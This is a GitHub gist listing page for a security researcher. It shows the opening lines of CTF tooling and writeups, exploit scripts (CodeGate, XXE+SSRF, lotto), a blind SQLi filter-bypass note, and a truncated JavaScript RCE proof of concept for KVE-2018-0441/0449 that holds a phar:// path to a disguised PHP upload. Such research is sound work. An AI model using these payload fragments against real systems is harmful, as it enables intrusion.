Skip to content

Instantly share code, notes, and snippets.

🆎**********************************
Be Lazy~

Harold Kim stypr

🆎**********************************
Be Lazy~
Block or report user

Report or block stypr

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@stypr
stypr / install.sh
Created Aug 16, 2019
Install MobSF Framework on CentOS 7 (with Headless Dynamic Analysis)
View install.sh
#!/bin/bash
# Maintainer: Harold Kim (root@stypr.com)
# Tested in CentOS 7.6.1810
# $ lsb_release -a
# LSB Version: :core-4.1-amd64:core-4.1-noarch
# Distributor ID: CentOS
# Description: CentOS Linux release 7.6.1810 (Core)
# Release: 7.6.1810
# Codename: Core
@stypr
stypr / composer.py
Last active Aug 17, 2019
Docker runner for CTF
View composer.py
#!/usr/bin/python
#-*- coding:utf-8 -*-
# Developer: Harold Kim (ho.kim@linecorp.com)
import os
import sys
import time
import urllib
import urllib2
@stypr
stypr / a-z.md
Last active May 19, 2019
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)
View a-z.md

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)
@stypr
stypr / exploit.py
Last active Aug 17, 2019
CodeGate 2019: Rich Project exploit
View exploit.py
import os
import urllib2
import urllib
import random
import sys
import time
import hashlib
def rand(sz=4):
return str(random.randint(10**sz, 100**sz))
@stypr
stypr / attack_script.js
Last active Aug 3, 2019
KVE-2018-0441, KVE-2018-0449 RCE PoC (Windows Only)
View attack_script.js
// 업로드한 파일의 페이로드.
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`;
var payload = `[PAYLOAD_URL]`
// 먼저 공격에 앞서, 해당 기능을 지원하는 관리자인지 확인한다.
$.get(`../qa_config.php`, function(d){
// 수정할 곳은 ”파일 경로“ 가 들어간 곳이므로, 이 부분만 우선 확인한다.
if(d.indexOf(`상단 파일 경로`) !== false){
@stypr
stypr / iptime_wol.py
Created Feb 13, 2018
iptime WOL in python
View iptime_wol.py
#!/usr/bin/python -u
#-*- coding: utf-8 -*-
# Developer: Harold Kim(root@stypr.com)
import os
import sys
import re
import requests
class iptime:
@stypr
stypr / README.md
Last active Aug 17, 2019
Blind SQLi 2018: Utilizing SQL standard to create payloads
View README.md

There are several ways to bypass blind SQLi filters, and today I will introduce MySQL blind sqli payload using an insert() function.

Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should be still valid in most SQL.

This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ... ) are blocked by the script.

TL;DR

@stypr
stypr / 9en3rat0r.php
Last active Aug 3, 2019
Lotto Exploit
View 9en3rat0r.php
<?php
function generator()
{
$PATH = "./s3cre7_fi1e";
$init_seed = 0;
if(!file_exists(realpath($PATH)))
{
$init_seed = $seed = intval(uniqid(),10);
$f = fopen($PATH,"w");
fwrite($f,$init_seed);
@stypr
stypr / exploit.py
Created Nov 3, 2017
familiar (485pt) XXE + SSRF
View exploit.py
#!/usr/bin/python -u
#-*- encoding: utf-8 -*-
import os
import sys
import requests
import json
from base64 import *
HOST = "core.eagle-jump.org"
@stypr
stypr / iptables-irccloud.sh
Created Oct 29, 2017
iptables configuration for connections between irssiproxy and irccloud
View iptables-irccloud.sh
iptables -N irccloud
iptables -A irccloud --src 192.184.9.108 -j ACCEPT
iptables -A irccloud --src 192.184.9.110 -j ACCEPT
iptables -A irccloud --src 192.184.9.112 -j ACCEPT
iptables -A irccloud --src 192.184.10.118 -j ACCEPT
iptables -A irccloud --src 192.184.10.9 -j ACCEPT
iptables -A irccloud --src 170.178.187.131 -j ACCEPT
iptables -A irccloud --src 192.184.8.73 -j ACCEPT
iptables -A irccloud --src 192.184.8.103 -j ACCEPT
iptables -A irccloud -j DROP
You can’t perform that action at this time.